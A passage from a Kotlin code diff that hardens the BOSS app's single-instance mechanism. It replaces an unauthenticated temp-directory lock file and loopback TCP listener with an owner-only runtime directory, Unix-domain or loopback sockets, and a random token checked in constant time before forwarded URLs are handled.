+ * directory long enough to breach that falls back to loopback TCP rather than
+ * failing to start.
+ */
+internal const val MAX_UNIX_SOCKET_PATH_LENGTH = 100
+
+private val ownerOnlyDirectoryPermissions =
+    setOf(
+        PosixFilePermission.OWNER_READ,
+        PosixFilePermission.OWNER_WRITE,
+        PosixFilePermission.OWNER_EXECUTE,
+    )
+
+private val ownerOnlyFilePermissions =
+    setOf(
+        PosixFilePermission.OWNER_READ,
+        PosixFilePermission.OWNER_WRITE,
+    )
+
+/** How the running instance can be reached. */
+internal enum class SingleInstanceTransport {
+    /** A Unix-domain socket inside the owner-only runtime directory. */
+    UNIX,
+
+    /** A loopback TCP port. Used where Unix-domain sockets are unavailable. */
+    TCP,
+}
+
+/**
+ * What the running instance published about itself: where to reach it, and the
+ * token a caller must present to be listened to.
  *
- * Uses file-based locking combined with TCP IPC to ensure only one instance of BOSS runs
- * and to pass URLs between instances.
+ * [toString] omits the token so a descriptor can be logged; nothing else should
+ * ever put [token] in a log line.
+ */
+internal data class InstanceDescriptor(
+    val transport: SingleInstanceTransport,
+    val endpoint: String,
+    val token: String,
+) {
+    fun encode(): String =
+        buildString {
+            appendLine("$KEY_VERSION=$DESCRIPTOR_VERSION")
+            appendLine("$KEY_TRANSPORT=${transport.name}")
+            appendLine("$KEY_ENDPOINT=$endpoint")
+            appendLine("$KEY_TOKEN=$token")
+        }
+
+    override fun toString(): String = "InstanceDescriptor(transport=$transport, endpoint=$endpoint, token=<redacted>)"
+}
+
+/**
+ * Parses a descriptor written by [InstanceDescriptor.encode], returning null for
+ * anything malformed, truncated or of another version — all of which mean "no
+ * usable instance published here", and are handled by reclaiming the file.
+ */
+internal fun parseInstanceDescriptor(text: String): InstanceDescriptor? {
+    val fields =
+        text
+            .lineSequence()
+            .map { it.trim() }
+            .filter { it.contains('=') }
+            .associate { it.substringBefore('=') to it.substringAfter('=') }
+
+    if (fields[KEY_VERSION] != DESCRIPTOR_VERSION) return null
+
+    val transport = SingleInstanceTransport.entries.firstOrNull { it.name == fields[KEY_TRANSPORT] }
+    val endpoint = fields[KEY_ENDPOINT]?.takeIf { it.isNotBlank() }
+    val token = fields[KEY_TOKEN]?.takeIf { it.length >= TOKEN_HEX_LENGTH }
+
+    return if (transport != null && endpoint != null && token != null) {
+        InstanceDescriptor(transport, endpoint, token)
+    } else {
+        null
+    }
+}
+
+/**
+ * One request read off the channel.
+ *
+ * @property token what the caller presented; compared against the live token
+ *   before anything is acted on.
+ * @property verb [VERB_PING] or [VERB_OPEN].
+ * @property origin for [VERB_OPEN], what the caller says the URL's provenance is.
+ *   Unrecognised labels become [DeepLinkOrigin.EXTERNAL].
+ * @property url for [VERB_OPEN], the URL to process; null for [VERB_PING].
+ */
+internal data class SingleInstanceRequest(
+    val token: String,
+    val verb: String,
+    val origin: DeepLinkOrigin,
+    val url: String?,
+)
+
+/**
+ * Parses a request line, returning null for anything that is not a complete,
+ * current-version request. A rejected line is never acted on.
+ *
+ * The line is `<protocol> <token> PING` or
+ * `<protocol> <token> OPEN <origin> <url>`; the URL is the whole remainder, so a
+ * URL containing spaces survives intact.
+ */
+internal fun parseRequestLine(line: String): SingleInstanceRequest? {
+    val parts = line.trim().split(' ', limit = 5)
+    if (parts.size < 3 || parts[0] != PROTOCOL_VERSION) return null
+
+    val token = parts[1]
+    return when (parts[2]) {
+        VERB_PING -> {
+            if (parts.size == 3) {
+                SingleInstanceRequest(token, VERB_PING, DeepLinkOrigin.EXTERNAL, null)
+            } else {
+                null
+            }
+        }
+
+        VERB_OPEN -> {
+            if (parts.size == 5) {
+                SingleInstanceRequest(token, VERB_OPEN, DeepLinkOrigin.fromWireLabel(parts[3]), parts[4])
+            } else {
+                null
+            }
+        }
+
+        else -> {
+            null
+        }
+    }
+}
+
+/** Builds the line [parseRequestLine] reads. Never log the result: it carries the token. */
+internal fun formatOpenRequest(
+    token: String,
+    origin: DeepLinkOrigin,
+    url: String,
+): String = "$PROTOCOL_VERSION $token $VERB_OPEN ${origin.name} $url"
+
+/** Builds a liveness probe line. Never log the result: it carries the token. */
+internal fun formatPingRequest(token: String): String = "$PROTOCOL_VERSION $token $VERB_PING"
+
+private val secureRandom = SecureRandom()
+
+/** Mints the channel token published in the descriptor. */
+internal fun newChannelToken(): String {
+    val bytes = ByteArray(TOKEN_BYTES)
+    secureRandom.nextBytes(bytes)
+    return HexFormat.of().formatHex(bytes)
+}
+
+/**
+ * Compares tokens without leaking how far they matched.
+ * [MessageDigest.isEqual] is the JDK's constant-time comparison.
+ */
+internal fun tokensMatch(
+    expected: String,
+    provided: String,
+): Boolean =
+    MessageDigest.isEqual(
+        expected.toByteArray(StandardCharsets.UTF_8),
+        provided.toByteArray(StandardCharsets.UTF_8),
+    )
+
+/** The schemes the app acts on when one instance forwards a URL to another. */
+internal fun isForwardableUrl(url: String?): Boolean =
+    url != null &&
+        (url.startsWith("boss://") || url.startsWith("http://") || url.startsWith("https://"))
+
+/**
+ * Where the running instance keeps its own state: a directory under BOSS's
+ * per-user data root, created owner-only.
+ *
+ * Deliberately not the system temp directory, which is shared between users on
+ * Linux — the descriptor holds the channel token, and the endpoint it names is
+ * where a forward (including the auth callback) gets delivered.
+ */
+private object SingleInstanceFiles {
+    private const val RUNTIME_DIR_NAME = "run"
+    private const val DESCRIPTOR_FILE_NAME = "single-instance"
+    private const val SOCKET_FILE_NAME = "single-instance.sock"
+
+    /** Pre-hardening lock file, which lived in the system temp directory. */
+    private const val LEGACY_LOCK_FILE_NAME = "boss-instance.lock"
+
+    /** Overridden by tests, so a test run never reads or writes the real `~/.boss`. */
+    @Volatile
+    var runtimeDirOverride: File? = null
+
+    private val runtimeDir: File
+        get() = runtimeDirOverride ?: BossDirectories.resolve(RUNTIME_DIR_NAME)
+
+    val descriptorFile: File
+        get() = File(runtimeDir, DESCRIPTOR_FILE_NAME)
+
+    val socketFile: File
+        get() = File(runtimeDir, SOCKET_FILE_NAME)
+
+    /**
+     * Creates the runtime directory owner-only, re-applying those permissions
+     * every startup so a directory left behind by an earlier version is tightened
+     * rather than trusted as it stands. Also clears the pre-hardening lock file,
+     * which nothing reads any more.
+     */
+    fun prepare() {
+        try {
+            Files.createDirectories(runtimeDir.toPath())
+            restrictToOwner(runtimeDir.toPath(), ownerOnlyDirectoryPermissions)
+            Files.deleteIfExists(File(System.getProperty("java.io.tmpdir"), LEGACY_LOCK_FILE_NAME).toPath())
+        } catch (e: IOException) {
+            logger.warn(LogCategory.SYSTEM, "Could not prepare the single-instance runtime directory", error = e)
+        }
+    }
+
+    /**
+     * Restricts [path] to its owner.
+     *
+     * On Windows there is no POSIX view; that per-user profile directory is
+     * already ACL-restricted to the user, and the File API's owner-only flags are
+     * applied as well.
+     */
+    fun restrictToOwner(
+        path: Path,
+        permissions: Set<PosixFilePermission>,
+    ) {
+        try {
+            Files.setPosixFilePermissions(path, permissions)
+        } catch (e: UnsupportedOperationException) {
+            logger.trace(
+                LogCategory.SYSTEM,
+                "POSIX permissions unavailable, using owner-only File flags",
+                mapOf("reason" to (e.message ?: "unsupported")),
+            )
+            val file = path.toFile()
+            file.setReadable(false, false)
+            file.setWritable(false, false)
+            file.setReadable(true, true)
+            file.setWritable(true, true)
+            if (permissions.contains(PosixFilePermission.OWNER_EXECUTE)) {
+                file.setExecutable(false, false)
+                file.setExecutable(true, true)
+            }
+        } catch (e: IOException) {
+            logger.warn(LogCategory.SYSTEM, "Could not restrict permissions", error = e)
+        }
+    }
+
+    /** Publishes [descriptor] owner-only, replacing whatever was there. */
+    fun write(descriptor: InstanceDescriptor): Boolean {
+        val path = descriptorFile.toPath()
+        val bytes = descriptor.encode().toByteArray(StandardCharsets.UTF_8)
+        return try {
+            Files.deleteIfExists(path)
+            try {
+                // Created with the right mode from the start, so the token is
+                // never briefly readable by anyone else.
+                Files
+                    .newByteChannel(
+                        path,
+                        setOf(StandardOpenOption.CREATE_NEW, StandardOpenOption.WRITE),
+                        PosixFilePermissions.asFileAttribute(ownerOnlyFilePermissions),
+                    ).use { it.write(ByteBuffer.wrap(bytes)) }
+            } catch (e: UnsupportedOperationException) {
+                logger.trace(
+                    LogCategory.SYSTEM,
+                    "POSIX file mode unavailable, writing then restricting",
+                    mapOf("reason" to (e.message ?: "unsupported")),
+                )
+                Files.write(path, bytes)
+                restrictToOwner(path, ownerOnlyFilePermissions)
+            }
+            true
+        } catch (e: IOException) {
+            logger.error(LogCategory.SYSTEM, "Could not write the single-instance descriptor", error = e)
+            false
+        }
+    }
+
+    fun read(): InstanceDescriptor? {
+        val file = descriptorFile
+        if (!file.isFile) return null
+        return try {
+            parseInstanceDescriptor(file.readText())
+        } catch (e: IOException) {
+            logger.warn(LogCategory.SYSTEM, "Could not read the single-instance descriptor", error = e)
+            null
+        }
+    }
+
+    /**
+     * Withdraws the descriptor, then the socket file. That order matters: a
+     * descriptor pointing at a removed socket is the state
+     * [SingleInstanceManager.acquireLock] reclaims cleanly, while a socket with no
+     * descriptor is unreachable and never cleaned up.
+     */
+    fun withdraw(descriptor: InstanceDescriptor?) {
+        try {
+            Files.deleteIfExists(descriptorFile.toPath())
+            if (descriptor?.transport == SingleInstanceTransport.UNIX) {
+                Files.deleteIfExists(File(descriptor.endpoint).toPath())
+            }
+        } catch (e: IOException) {
+            logger.warn(LogCategory.SYSTEM, "Error removing single-instance files", error = e)
+        }
+    }
+}
+
+/**
+ * The socket mechanics: binding an endpoint, and one bounded request/response
+ * exchange over it.
+ *
+ * The 10-second budget is enforced by closing the channel underneath a blocked
+ * read, because a blocking [SocketChannel] has no read timeout of its own.
+ */
+private object SingleInstanceWire {
+    private val watchdog =
+        Executors.newSingleThreadScheduledExecutor(
+            ThreadFactory { runnable -> Thread(runnable, "BOSS-IPC-Watchdog").apply { isDaemon = true } },
+        )
+
+    /**
+     * Binds the Unix-domain socket, or returns null when this platform or path
+     * cannot have one (a JDK without AF_UNIX, an over-long socket path).
+     */
+    fun openUnixServer(
+        socketFile: File,
+        token: String,
+    ): Pair<ServerSocketChannel, InstanceDescriptor>? {
+        val path = socketFile.toPath()
+        if (path.toString().length > MAX_UNIX_SOCKET_PATH_LENGTH) {
+            logger.debug(LogCategory.SYSTEM, "Socket path too long for a Unix-domain channel, using loopback TCP")
+            return null
+        }
+
+        return try {
+            // A socket file left by a crashed instance would make bind fail with
+            // "address already in use". The caller has already established that
+            // nothing answers there, so removing it is safe.
+            Files.deleteIfExists(path)
+
+            val channel = ServerSocketChannel.open(StandardProtocolFamily.UNIX)
+            channel.bind(UnixDomainSocketAddress.of(path))
+            SingleInstanceFiles.restrictToOwner(path, ownerOnlyFilePermissions)
+            channel to InstanceDescriptor(SingleInstanceTransport.UNIX, path.toString(), token)
+        } catch (e: UnsupportedOperationException) {
+            logger.debug(
+                LogCategory.SYSTEM,
+                "Unix-domain sockets unavailable, using loopback TCP",
+                mapOf("reason" to (e.message ?: "unsupported")),
+            )
+            null
+        } catch (e: IOException) {
+            logger.debug(
+                LogCategory.SYSTEM,
+                "Could not bind the Unix-domain channel, using loopback TCP",
+                mapOf("reason" to (e.message ?: "io error")),
+            )
+            null
+        }
+    }
+
+    /** Binds the first free loopback port in the configured range, or null if all are taken. */
+    fun openTcpServer(token: String): Pair<ServerSocketChannel, InstanceDescriptor>? {
+        for (port in IPC_PORT_BASE until (IPC_PORT_BASE + IPC_PORT_RANGE)) {
+            try {
+                val channel = ServerSocketChannel.open()
+                channel.bind(InetSocketAddress(InetAddress.getLoopbackAddress(), port), TCP_BACKLOG)
+                return channel to InstanceDescriptor(SingleInstanceTransport.TCP, port.toString(), token)
+            } catch (e: IOException) {
+                logger.trace(
+                    LogCategory.SYSTEM,
+                    "Loopback port unavailable",
+                    mapOf("port" to port, "reason" to (e.message ?: "io error")),
+                )
+            }
+        }
+        return null
+    }
+
+    /** True when something on [descriptor]'s endpoint answers a probe with the published token. */
+    fun respondsToPing(descriptor: InstanceDescriptor): Boolean {
+        val response = exchange(descriptor, formatPingRequest(descriptor.token))
+        return response == RESPONSE_PONG
+    }
+
+    /** Sends one line and reads one bounded line back, within the connection budget. */
+    fun exchange(
+        descriptor: InstanceDescriptor,
+        request: String,
+    ): String? {
+        val channel = connect(descriptor) ?: return null
+        val budget = closeAfterBudget(channel)
+        return try {
+            channel.use {
+                writeLine(it, request)
+                readBoundedLine(BufferedInputStream(Channels.newInputStream(it)), MAX_RESPONSE_BYTES)
+            }
+        } catch (e: IOException) {
+            logger.debug(
+                LogCategory.SYSTEM,
+                "Single-instance exchange failed",
+                mapOf("reason" to (e.message ?: "io error")),
+            )
+            null
+        } finally {
+            budget.cancel(false)
+        }
+    }
+
+    private fun connect(descriptor: InstanceDescriptor): SocketChannel? =
+        try {
+            when (descriptor.transport) {
+                SingleInstanceTransport.UNIX -> {
+                    SocketChannel.open(UnixDomainSocketAddress.of(descriptor.endpoint))
+                }
+
+                SingleInstanceTransport.TCP -> {
+                    SocketChannel.open(
+                        InetSocketAddress(InetAddress.getLoopbackAddress(), descriptor.endpoint.toInt()),
+                    )
+                }
+            }
+        } catch (e: IOException) {
+            // Nothing listening is the ordinary case for a stale descriptor.
+            logger.debug(
+                LogCategory.SYSTEM,
+                "Nothing reachable on the single-instance endpoint",
+                mapOf("transport" to descriptor.transport.name, "reason" to (e.message ?: "io error")),
+            )
+            null
+        } catch (e: NumberFormatException) {
+            logger.warn(
+                LogCategory.SYSTEM,
+                "Malformed endpoint in the single-instance descriptor",
+                mapOf("reason" to (e.message ?: "not a port")),
+            )
+            null
+        }
+
+    /**
+     * Reads one line, giving up once [maxBytes] have arrived without one, so a
+     * caller cannot make the app buffer without limit.
+     */
+    fun readBoundedLine(
+        input: InputStream,
+        maxBytes: Int,
+    ): String? {
+        val buffer = ByteArrayOutputStream()
+        var overBudget = false
+        var next = input.read()
+        while (next != -1 && next != '\n'.code) {
+            if (buffer.size() >= maxBytes) {
+                overBudget = true
+                break
+            }
+            buffer.write(next)
+            next = input.read()
+        }
+
+        if (overBudget) {
+            logger.warn(LogCategory.SYSTEM, "Single-instance request exceeded its size budget, dropping")
+            return null
+        }
+        return buffer.toString(StandardCharsets.UTF_8).takeIf { it.isNotEmpty() }
+    }
+
+    fun writeLine(
+        channel: SocketChannel,
+        line: String,
+    ) {
+        val output = Channels.newOutputStream(channel)
+        output.write("$line\n".toByteArray(StandardCharsets.UTF_8))
+        output.flush()
+    }
+
+    fun closeAfterBudget(channel: SocketChannel): ScheduledFuture<*> =
+        watchdog.schedule(
+            Runnable {
+                if (channel.isOpen) {
+                    logger.warn(LogCategory.SYSTEM, "Closing a single-instance connection that overran its budget")
+                    closeQuietly(channel)
+                }
+            },
+            CONNECTION_TIMEOUT_MS,
+            TimeUnit.MILLISECONDS,
+        )
+
+    private fun closeQuietly(channel: SocketChannel) {
+        try {
+            channel.close()
+        } catch (e: IOException) {
+            logger.trace(LogCategory.SYSTEM, "Error closing channel", mapOf("reason" to (e.message ?: "io error")))
+        }
+    }
+}
+
+/**
+ * Manages single-instance application behavior.
+ *
+ * The running instance publishes a descriptor and listens on a local channel, so
+ * a second launch can hand over its URL and exit instead of opening a second app.
  *
  * Architecture:
- * - Lock file in temp directory prevents multiple instances
- * - TCP socket on localhost allows new instances to send URLs to existing instance
- * - Stale lock detection handles crashed processes
+ * - The descriptor lives in BOSS's own per-user data root (`~/.boss/run`, created
+ *   owner-only) and records the channel endpoint plus a token minted fresh at
+ *   startup. It records no pid.
+ * - The channel is a Unix-domain socket inside that directory where the JDK
+ *   supports one (macOS, Linux), and a loopback TCP port otherwise (Windows).
+ *   Either way the token is what establishes that a caller may be listened to:
+ *   every request must present it, and one that does not is refused before it is
+ *   read for meaning.
+ * - "Is another instance running" is answered by whether something replies on the
+ *   channel, not by whether some pid exists — a pid is trivially some other
+ *   program — and a descriptor nobody answers on is reclaimed, so a file left
+ *   behind by a crash can never stop the app from starting.
+ *
+ * What the token establishes, and what it does not: holding it proves the caller
+ * could read a file in this user's own data root, so a caller is this user, or
+ * something already running with this user's access. It says nothing about *which*
+ * program is calling. That is why a forwarded URL carries the origin the forwarder
+ * determined, rather than being trusted on the strength of the token — see
+ * [DeepLinkOrigin].
  *
  * Usage:
  * ```
@@ -31,178 +602,106 @@ import kotlin.concurrent.thread
  *     SingleInstanceManager.sendToExistingInstance("boss://auth/verify?token=...")
  *     exitProcess(0)
  * }
- *
- * // First instance - start listening
- * SingleInstanceManager.startListening { url ->
- *     DeepLinkHandler.processDeepLink(url)
- * }
  * ```
  */
 object SingleInstanceManager {
-    private val logger = BossLogger.forComponent("SingleInstanceManager")
-
-    private const val LOCK_FILE_NAME = "boss-instance.lock"
-    private const val IPC_PORT_BASE = 56789
-    private const val IPC_PORT_RANGE = 10 // Try ports 56789-56798
-    private const val CONNECTION_TIMEOUT_MS = 10000 // 10 seconds - important for auth deep links
-
-    private var serverSocket: ServerSocket? = null
-    private var lockFile: File? = null
-    private var actualPort: Int = IPC_PORT_BASE
+    private var serverChannel: ServerSocketChannel? = null
     private var listenerThread: Thread? = null
+
+    @Volatile
     private var isListening: Boolean = false
 
+    /** The descriptor this process published, or null when it is not the owner. */
+    @Volatile
+    private var published: InstanceDescriptor? = null
+
+    /** Runtime directory override for tests; see [SingleInstanceFiles.runtimeDirOverride]. */
+    internal var runtimeDirOverride: File?
+        get() = SingleInstanceFiles.runtimeDirOverride
+        set(value) {
+            SingleInstanceFiles.runtimeDirOverride = value
+        }
+
     /**
-     * Check if another instance of BOSS is already running
-     * Does not acquire the lock - use acquireLock() for that
+     * Check whether another instance of BOSS is already running, by asking it.
+     * Does not take ownership - use [acquireLock] for that.
      */
     fun isAnotherInstanceRunning(): Boolean {
-        val tempDir = System.getProperty("java.io.tmpdir")
-        val lock = File(tempDir, LOCK_FILE_NAME)
+        val descriptor = SingleInstanceFiles.read() ?: return false
+        return SingleInstanceWire.respondsToPing(descriptor)
+    }
 
-        if (!lock.exists()) {
+    /**
+     * Try to become the single instance.
+     *
+     * Returns true if we are the one, false if another instance is answering on
+     * the channel. On success the channel is listening and the descriptor is
+     * published.
+     */
+    fun acquireLock(): Boolean {
+        SingleInstanceFiles.prepare()
+
+        val existing = SingleInstanceFiles.read()
+        if (existing != null && SingleInstanceWire.respondsToPing(existing)) {
+            logger.info(LogCategory.SYSTEM, "Another instance is answering on the single-instance channel")
+            return false
+        }
+        if (existing != null) {
+            // Nothing answers, so this descriptor outlived its process.
+            logger.debug(LogCategory.SYSTEM, "Reclaiming a single-instance descriptor nothing answers on")
+        }
+
+        return startServer()
+    }
+
+    /**
+     * Bind the channel, publish the descriptor and start accepting.
+     * Returns false when there is nothing a second launch could reach.
+     */
+    private fun startServer(): Boolean {
+        val token = newChannelToken()
+        val bound =
+            SingleInstanceWire.openUnixServer(SingleInstanceFiles.socketFile, token)
+                ?: SingleInstanceWire.openTcpServer(token)
+        serverChannel = bound?.first
+
+        // Without a published descriptor no second launch could reach us, and the
+        // token would be unknowable, so failing to publish is failing to start
+        // rather than listening on something nobody can address.
+        val descriptor = bound?.second?.takeIf { SingleInstanceFiles.write(it) }
+        if (descriptor == null) {
+            logger.error(
+                LogCategory.SYSTEM,
+                if (bound == null) {
+                    "Failed to bind the single-instance channel on any endpoint"
+                } else {
+                    "Failed to publish the single-instance descriptor"
+                },
+            )
+            release()
             return false
         }
 
-        // Check if the process is still alive
-        return try {
-            val pid = lock.readText().trim().toLongOrNull()
-            if (pid != null && isProcessAlive(pid)) {
-                true
-            } else {
-                // Stale lock file
-                logger.debug(LogCategory.SYSTEM, "Stale lock file detected", mapOf("pid" to (pid ?: "null")))
-                false
-            }
-        } catch (e: Exception) {
-            logger.warn(LogCategory.SYSTEM, "Error checking lock file", error = e)
-            false
-        }
+        published = descriptor
+        logger.info(
+            LogCategory.SYSTEM,
+            "Single-instance channel listening",
+            mapOf("transport" to descriptor.transport.name, "endpoint" to descriptor.endpoint),
+        )
+
+        startAcceptLoop()
+        return true
     }
 
-    /**
-     * Try to acquire the single-instance lock
-     * Returns true if we're the first instance, false if another instance is already running
-     *
-     * If successful, automatically starts the IPC server
-     */
-    fun acquireLock(): Boolean {
-        val tempDir = System.getProperty("java.io.tmpdir")
-        lockFile = File(tempDir, LOCK_FILE_NAME)
-
-        return try {
-            // Check for existing instance
-            if (lockFile!!.exists()) {
-                val pid = lockFile!!.readText().trim().toLongOrNull()
-                if (pid != null && isProcessAlive(pid)) {
-                    logger.info(LogCategory.SYSTEM, "Another instance is running", mapOf("pid" to pid))
-                    return false
-                } else {
-                    // Stale lock - delete and continue
-                    logger.debug(LogCategory.SYSTEM, "Removing stale lock file", mapOf("pid" to (pid ?: "null")))
-                    lockFile!!.delete()
-                }
-            }
-
-            // Try to create lock file
-            if (lockFile!!.createNewFile()) {
-                lockFile!!.deleteOnExit()
-
-                // Write current PID to lock file
-                val currentPid = ProcessHandle.current().pid()
-                lockFile!!.writeText("$currentPid\n$actualPort")
-                logger.info(LogCategory.SYSTEM, "Acquired single-instance lock", mapOf("pid" to currentPid))
-
-                // Start IPC server
-                startServer()
-                true
-            } else {
-                logger.warn(LogCategory.SYSTEM, "Failed to create lock file")
-                false
-            }
-        } catch (e: Exception) {
-            logger.error(LogCategory.SYSTEM, "Failed to acquire lock", error = e)
-            false
-        }
-    }
-
-    /**
-     * Start the IPC server to receive URLs from new instances
-     * Automatically finds an available port in the configured range
-     */
-    private fun startServer() {
-        // Try to bind to a port in the range
-        var boundSuccessfully = false
-        var lastException: Exception? = null
-
-        for (port in IPC_PORT_BASE until (IPC_PORT_BASE + IPC_PORT_RANGE)) {
-            try {
-                serverSocket = ServerSocket(port, 5, InetAddress.getLoopbackAddress())
-                actualPort = port
-                boundSuccessfully = true
-                logger.debug(LogCategory.SYSTEM, "IPC server started", mapOf("port" to port))
-
-                // Update lock file with actual port atomically
-                // Write PID and port together to prevent race condition
-                lockFile?.let { file ->
-                    val currentPid = ProcessHandle.current().pid()
-                    file.writeText("$currentPid\n$actualPort")
-                }
-
-                break
-            } catch (e: Exception) {
-                lastException = e
-                // Try next port
-            }
-        }
-
-        if (!boundSuccessfully) {
-            // Port exhaustion - clean up lock file and fail gracefully
-            logger.error(
-                LogCategory.SYSTEM,
-                "Failed to start IPC server on any port",
-                mapOf(
-                    "portRange" to "$IPC_PORT_BASE-${IPC_PORT_BASE + IPC_PORT_RANGE - 1}",
-                    "lastError" to (lastException?.message ?: "unknown"),
-                ),
-            )
-
-            // Delete lock file so next instance can try again
-            try {
-                lockFile?.delete()
-                lockFile = null
-            } catch (e: Exception) {
-                logger.warn(LogCategory.SYSTEM, "Failed to clean up lock file", error = e)
-            }
-
-            throw java.io.IOException(
-                "Unable to bind IPC server: All ports $IPC_PORT_BASE-${IPC_PORT_BASE + IPC_PORT_RANGE - 1} are in use. " +
-                    "This may indicate port conflicts or firewall issues. Original error: ${lastException?.message}",
-            )
-        }
-
-        // Start listener thread
+    private fun startAcceptLoop() {
         isListening = true
         listenerThread =
             thread(isDaemon = true, name = "BOSS-IPC-Listener") {
                 logger.trace(LogCategory.SYSTEM, "IPC listener thread started")
 
                 while (isListening && !Thread.currentThread().isInterrupted) {
-                    try {
-                        val clientSocket = serverSocket?.accept()
-                        if (clientSocket != null) {
-                            handleClient(clientSocket)
-                        }
-                    } catch (e: SocketException) {
-                        if (isListening) {
-                            logger.warn(LogCategory.SYSTEM, "Socket error in IPC listener", error = e)
-                        }
-                        break
-                    } catch (e: Exception) {
-                        if (isListening) {
-                            logger.warn(LogCategory.SYSTEM, "Error in IPC listener", error = e)
-                        }
-                    }
+                    val client = acceptNext() ?: break
+                    handleClient(client)
                 }
 
                 logger.trace(LogCategory.SYSTEM, "IPC listener thread stopped")
@@ -210,180 +709,163 @@ object SingleInstanceManager {
     }
 
     /**
-     * Handle incoming connection from a new instance
+     * Waits for the next connection, or returns null once the channel is gone —
+     * which is what [release] closing it looks like from here.
      */
-    private fun handleClient(clientSocket: Socket) {
-        thread(name = "BOSS-IPC-Client-Handler") {
+    private fun acceptNext(): SocketChannel? =
+        try {
+            serverChannel?.accept()
+        } catch (e: IOException) {
+            if (isListening) {
+                logger.warn(LogCategory.SYSTEM, "Error in IPC listener", error = e)
+            }
+            null
+        }
+
+    /**
+     * Handle one connection.
+     *
+     * The token is checked before the request means anything, so a caller that
+     * cannot present it gets a refusal and nothing else.
+     */
+    private fun handleClient(client: SocketChannel) {
+        thread(isDaemon = true, name = "BOSS-IPC-Client-Handler") {
+            val budget = SingleInstanceWire.closeAfterBudget(client)
             try {
-                clientSocket.use { socket ->
-                    socket.soTimeout = CONNECTION_TIMEOUT_MS
-
-                    val reader = BufferedReader(InputStreamReader(socket.getInputStream()))
-                    val url = reader.readLine()
-
-                    if (url.isNullOrBlank()) {
-                        logger.debug(LogCategory.SYSTEM, "Received empty URL from new instance")
-                        return@use
-                    }
-
-                    logger.info(LogCategory.SYSTEM, "Received URL from new instance")
-
-                    // Process the URL
-                    if (url.startsWith("boss://") || url.startsWith("http://") || url.startsWith("https://")) {
-                        DeepLinkHandler.processDeepLink(url)
-                    } else {
-                        logger.warn(LogCategory.SYSTEM, "Invalid URL protocol received")
-                    }
-
-                    // Send acknowledgment
-                    val writer = PrintWriter(socket.getOutputStream(), true)
-                    writer.println("OK")
+                client.use { channel ->
+                    val line =
+                        SingleInstanceWire.readBoundedLine(
+                            BufferedInputStream(Channels.newInputStream(channel)),
+                            MAX_REQUEST_BYTES,
+                        )
+                    SingleInstanceWire.writeLine(channel, responseFor(line?.let { parseRequestLine(it) }))
                 }
-            } catch (e: SocketTimeoutException) {
-                logger.warn(LogCategory.SYSTEM, "Client connection timeout", error = e)
-            } catch (e: Exception) {
-                logger.error(LogCategory.SYSTEM, "Error handling client", error = e)
+            } catch (e: IOException) {
+                logger.debug(
+                    LogCategory.SYSTEM,
+                    "Single-instance connection ended early",
+                    mapOf("reason" to (e.message ?: "io error")),
+                )
+            } finally {
+                budget.cancel(false)
             }
         }
     }
 
     /**
-     * Send a URL to the existing instance
-     * Returns true if successfully sent, false otherwise
+     * Checks the token, then acts on the request, returning the response to send
+     * back. A request that does not present the live token is refused here,
+     * before its contents mean anything.
      */
-    fun sendToExistingInstance(url: String): Boolean {
+    private fun responseFor(request: SingleInstanceRequest?): String {
+        val expected = published?.token
+        if (request == null || expected == null || !tokensMatch(expected, request.token)) {
+            logger.warn(LogCategory.SYSTEM, "Refused a single-instance request that did not present the channel token")
+            return RESPONSE_REJECTED
+        }
+
+        return when {
+            request.verb == VERB_PING -> {
+                RESPONSE_PONG
+            }
+
+            request.verb == VERB_OPEN && isForwardableUrl(request.url) -> {
+                logger.info(
+                    LogCategory.SYSTEM,
+                    "Received URL from new instance",
+                    mapOf("origin" to request.origin.name),
+                )
+                // The forwarding instance states the URL's provenance; it is not
+                // inferred from the caller having held the token, which says
+                // nothing about where the URL came from.
+                DeepLinkHandler.processDeepLink(requireNotNull(request.url), request.origin)
+                RESPONSE_OK
+            }
+
+            else -> {
+                logger.warn(LogCategory.SYSTEM, "Refused a single-instance request BOSS does not serve")
+                RESPONSE_REJECTED
+            }
+        }
+    }
+
+    /**
+     * Send a URL to the existing instance.
+     *
+     * @param origin what the caller knows about where [url] came from. Defaults to
+     *   [DeepLinkOrigin.EXTERNAL], because a forwarded URL normally reached this
+     *   process from the OS.
+     * @return true if the running instance acknowledged it.
+     */
+    fun sendToExistingInstance(
+        url: String,
+        origin: DeepLinkOrigin = DeepLinkOrigin.EXTERNAL,
+    ): Boolean {
         if (url.isBlank()) {
             logger.warn(LogCategory.SYSTEM, "Cannot send empty URL to existing instance")
             return false
         }
 
-        // Read port from lock file
-        val port = getPortFromLockFile() ?: IPC_PORT_BASE
-
-        return try {
-            logger.debug(LogCategory.SYSTEM, "Attempting to connect to existing instance", mapOf("port" to port))
-
-            // Create socket with connection timeout
-            val socket = Socket()
-            socket.connect(
-                java.net.InetSocketAddress(InetAddress.getLoopbackAddress(), port),
-                CONNECTION_TIMEOUT_MS,
-            )
-
-            socket.use {
-                // Set read timeout for acknowledgment
-                it.soTimeout = CONNECTION_TIMEOUT_MS
-
-                // Send URL
-                val writer = PrintWriter(it.getOutputStream(), true)
-                writer.println(url)
-                logger.debug(LogCategory.SYSTEM, "Sent URL to existing instance")
-
-                // Wait for acknowledgment
-                val reader = BufferedReader(InputStreamReader(it.getInputStream()))
-                val response = reader.readLine()
-
-                if (response == "OK") {
-                    logger.info(LogCategory.SYSTEM, "Existing instance acknowledged URL")
-                    true
-                } else {
-                    logger.warn(LogCategory.SYSTEM, "Unexpected response from existing instance", mapOf("response" to (response ?: "null")))
-                    false
-                }
+        val response =
+            SingleInstanceFiles.read()?.let { target ->
+                logger.debug(
+                    LogCategory.SYSTEM,
+                    "Attempting to connect to existing instance",
+                    mapOf("transport" to target.transport.name, "endpoint" to target.endpoint),
+                )
+                SingleInstanceWire.exchange(target, formatOpenRequest(target.token, origin, url))
             }
-        } catch (e: Exception) {
-            logger.error(LogCategory.SYSTEM, "Failed to send URL to existing instance", error = e)
-            false
-        }
-    }
 
-    /**
-     * Get the IPC port from the lock file
-     */
-    private fun getPortFromLockFile(): Int? {
-        val tempDir = System.getProperty("java.io.tmpdir")
-        val lock = File(tempDir, LOCK_FILE_NAME)
-
-        if (!lock.exists()) {
-            return null
-        }
-
-        return try {
-            val lines = lock.readLines()
-            if (lines.size >= 2) {
-                lines[1].trim().toIntOrNull()
-            } else {
-                null
-            }
-        } catch (e: Exception) {
-            logger.warn(LogCategory.SYSTEM, "Error reading port from lock file", error = e)
-            null
-        }
-    }
-
-    /**
-     * Check if a process with the given PID is alive
-     */
-    private fun isProcessAlive(pid: Long): Boolean =
-        try {
-            ProcessHandle
-                .of(pid)
-                .map { it.isAlive }
